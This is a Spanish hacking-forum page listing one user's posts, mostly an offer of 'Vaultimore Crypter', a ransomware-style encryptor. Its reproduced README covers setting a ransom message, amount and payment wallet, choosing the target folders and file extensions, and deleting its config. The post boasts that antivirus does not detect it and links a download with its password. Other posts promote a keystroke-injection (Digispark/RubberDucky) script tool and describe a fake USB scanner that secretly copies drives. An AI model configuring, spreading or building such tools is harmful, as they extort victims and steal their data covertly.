Link updated!
Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.
Páginas1
#1
Análisis y desarrollo de malwares / Re:Vaultimore Crypter 1.1 # Especie de "Ransomware"
Agosto 28, 2018, 08:13:09 AM #2
Análisis y desarrollo de malwares / Vaultimore Crypter 1.1 # Especie de "Ransomware"
Junio 20, 2018, 11:49:00 AM
Buenas amigos.
Voy a dejar por aquí un pequeño sistema que trabaja como un ransomware "algo más liviano". Digo esto por que no va a infectarse toda una red, ni enviar por email ni nada de eso. Explico.
Es un programita que cuando se ejecuta, encripta los archivos que haya encontrado en el directorio indicado previamente. La búsqueda es recursiva y puedes buscar por varias extensiones a la vez.
El programa no tiene interfaz, sólo se ve por unos segundos un pequeño cuadro negro en la parte inferior derecha del monitor. Cuando termina se cierra el proceso.
Dejo algunas capturas y voy a pegar aquí el README en inglés que he creado para indicar un poco su uso.
Código: php
Como véis es bastante configurable. Por defecto y como máximo puede buscar archivos extensiones de hasta 4 caracteres de largo para su posterior encriptación. Si por ejemplo la variable pathtosearch la configuras como:
pathtosearch=C:/
Va a demorarse más en sacar todos los archivos con las extensiones indicadas que si la estableces en esto:
pathtosearch=::documents::
Qué sólo buscará en la carpeta de Mis Documentos.
No lo detecta ningún antivirus, en Virustotal hay 2 falsos positivos por que no tiene nada que ver lo que "detecta" con lo que "debería detectar"
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Me gustaría tener opiniones de qué tal el funcionamiento. Por el momento no voy a compartir el código ya que el sistema que uso para programar es anticuado pero nadie le saca tanto partido como yo
.
Dejaré el enlace activo sólo unos días.
NUEVO LINK ACTUALIZADO ZIPPYSHARE
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
ZIP PASS: 1122A
Un saludo a tod@s!
Voy a dejar por aquí un pequeño sistema que trabaja como un ransomware "algo más liviano". Digo esto por que no va a infectarse toda una red, ni enviar por email ni nada de eso. Explico.
Es un programita que cuando se ejecuta, encripta los archivos que haya encontrado en el directorio indicado previamente. La búsqueda es recursiva y puedes buscar por varias extensiones a la vez.
El programa no tiene interfaz, sólo se ve por unos segundos un pequeño cuadro negro en la parte inferior derecha del monitor. Cuando termina se cierra el proceso.
Dejo algunas capturas y voy a pegar aquí el README en inglés que he creado para indicar un poco su uso.
Vaultimore.exe -> Crypter. CAUTION! Only need execute to run!
VaultimoreDEC.exe -> Decrypter. CAUTION Need params.ini with same config to encryption for decrypt.
## CONFIGURATION ##
.......................
It is only necessary to configure the parameters that are at the beginning of this file. Change the values after the = sign.
......................
msg1 -> Message explaining what happened. You can write whatever you want.
......................
ammount -> Rescue money. Includes the currency code.
......................
walletaddress -> It is where you can establish the address where they will make the payment.
......................
pathtosearch -> Directory where it will search the files to be encrypted. The search includes all subdirectories. You can set parameters like these:
C:/Users/::username::/...
In this case, the username variable will refer to the user name of the machine. These variables are always established between :: and ::.
The available ones are:
::username:: The name of the Windows User
::documents:: Documents directory (example usage: ::documents::/anyfolder/) Is equal to C:\Users\JOSE\Documents\anyfolder
::programfiles:: Program files directory (example usage: ::programfiles::/Adobe/) Is equal to c:\program files\adobe\
.......................
extensionstoencrypt -> Sets the extensions of the file types to be encrypted. (Example: *.txt;*.mdb;*.csv)
.......................
cryptextension -> Extension for crypt files with any word extension. (Example: .criptin)
.......................
cryptpass - > Master password to encryption. IMPORTANT!!! This same password is necessary to decrypt the files again.
.......................
deleteparams -> 1 = Delete params.ini after execution. 0 = NO delete params.ini after execution. CAUTION Need params.ini with same config to encryption for decrypt.
Como véis es bastante configurable. Por defecto y como máximo puede buscar archivos extensiones de hasta 4 caracteres de largo para su posterior encriptación. Si por ejemplo la variable pathtosearch la configuras como:
pathtosearch=C:/
Va a demorarse más en sacar todos los archivos con las extensiones indicadas que si la estableces en esto:
pathtosearch=::documents::
Qué sólo buscará en la carpeta de Mis Documentos.
No lo detecta ningún antivirus, en Virustotal hay 2 falsos positivos por que no tiene nada que ver lo que "detecta" con lo que "debería detectar"
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Me gustaría tener opiniones de qué tal el funcionamiento. Por el momento no voy a compartir el código ya que el sistema que uso para programar es anticuado pero nadie le saca tanto partido como yo
.Dejaré el enlace activo sólo unos días.
NUEVO LINK ACTUALIZADO ZIPPYSHARE
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
ZIP PASS: 1122A
Un saludo a tod@s!
#3
Hacking / Re:DigiScript SUITE Beta - Editor de scripts para DIGISPARK
Agosto 16, 2017, 04:31:37 PM
Buenas!
Gracias por molestarte en probarlo.
Como dije en el primer post, esto es una simple GUI para duck2spark, por lo que ese problema viene desde el compilador del mismo.
De todas formas, he estado investigando y he podido escribir el backslash \ con Digispark sin problemas haciendo esto:
DigiKeyboard.sendKeyPress(0x61,MOD_ALT_LEFT);
DigiKeyboard.sendKeyPress(0x5A,MOD_ALT_LEFT);
DigiKeyboard.sendKeyPress(0);
Intentaré integrarlo en la aplicación.
Un saludo!
Gracias por molestarte en probarlo.
Como dije en el primer post, esto es una simple GUI para duck2spark, por lo que ese problema viene desde el compilador del mismo.
De todas formas, he estado investigando y he podido escribir el backslash \ con Digispark sin problemas haciendo esto:
DigiKeyboard.sendKeyPress(0x61,MOD_ALT_LEFT);
DigiKeyboard.sendKeyPress(0x5A,MOD_ALT_LEFT);
DigiKeyboard.sendKeyPress(0);
Intentaré integrarlo en la aplicación.
Un saludo!
#4
Hacking / Re:DigiScript SUITE Beta - Editor de scripts para DIGISPARK
Agosto 13, 2017, 05:18:15 PM
Buenas!
Correcto lo que dice noxonsoftwares, en la parte inferior está la selección del layout del teclado.
Saludos!
Correcto lo que dice noxonsoftwares, en la parte inferior está la selección del layout del teclado.
Saludos!
#5
Hacking / Re:Silent USB Copy, Roba datos de USBs que se conectan a tu PC
Agosto 12, 2017, 08:22:12 AM
Yo en su día cree una app que se llamaba Fake USB Checker, que simulaba un analisis al pendrive nada más conectarlo, mientras lo que hacía era copiar todo. Lo liberé en un foro de la Deepweb y tuvo mucho éxito, haber si lo vuelvo a compilar y os lo dejo por aquí.
saludos.
saludos.
#6
Hacking / Re:[Rubber Ducky] DigiDucky desde 0 hasta la intrusion.
Agosto 12, 2017, 07:45:40 AM
Hola amigos!
Echar un vistazo a esto:
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Saludos!
Echar un vistazo a esto:
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Saludos!
#7
Hacking / DigiScript SUITE Beta - Editor de scripts para DIGISPARK
Agosto 12, 2017, 07:44:10 AM
Buenas amigos.
Como dije hace tiempo en otro post que se hablaba de DIGISPARK, quería crear algún tipo de sistema para que usar nuestros digispark sea sencillo.
He creado una pequeña suite, donde podremos crear nuestros scripts bajo la sintaxis de RubberDucky de Hak5.
Internamente usa el No tienes permitido ver los links. Registrarse o Entrar a mi cuenta como sistema para crear el script final.
Tenéis que elegir un directorio que servirá como biblioteca dónde se guardarán los scripts credos desde el software.
Es una versión beta, puede contener algún que otro fallo y la verdad me gustaría que fueran reportados para ir puliendo el software.
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Descarga MEGA desde aquí: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
VIRUSTOTAL SCAN: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Espero que sirva de utilidad para los que trasteamos con Digispark.
Opiniones y sugerencias son bienvenidas!
Saludos a tod@s!
#8
Otros lenguajes / Re:[ACTUALIZADO] Cramel Editor v0.1 by Fudmario
Mayo 04, 2017, 02:28:18 PM
Enlace caido!
#9
Hacking / Re:[Rubber Ducky] DigiDucky desde 0 hasta la intrusion.
Mayo 04, 2017, 02:20:29 PM
Buenas!
Gracias por esta info, llevo un par de días trasteando con Digispark y la verdad que por 1 euro es una pasada.
Estoy tratando de hacer que un teclado europeo funcione sin problemas, soy un poco novato para esto.
Estaría bien ir recopilando información sobre digispark, ya que en español es muy escaso lo que hay.
He estado probando Duck2Park y parece que funciona bastante bien.
Ahora me he puesto a desarollar una aplicación para programar con digispark, quiero hacer algo similar a esto: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Y también le integraré directamente Duck2Park.
Saludos!
Gracias por esta info, llevo un par de días trasteando con Digispark y la verdad que por 1 euro es una pasada.
Estoy tratando de hacer que un teclado europeo funcione sin problemas, soy un poco novato para esto.
Estaría bien ir recopilando información sobre digispark, ya que en español es muy escaso lo que hay.
He estado probando Duck2Park y parece que funciona bastante bien.
Ahora me he puesto a desarollar una aplicación para programar con digispark, quiero hacer algo similar a esto: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Y también le integraré directamente Duck2Park.
Saludos!
Páginas1
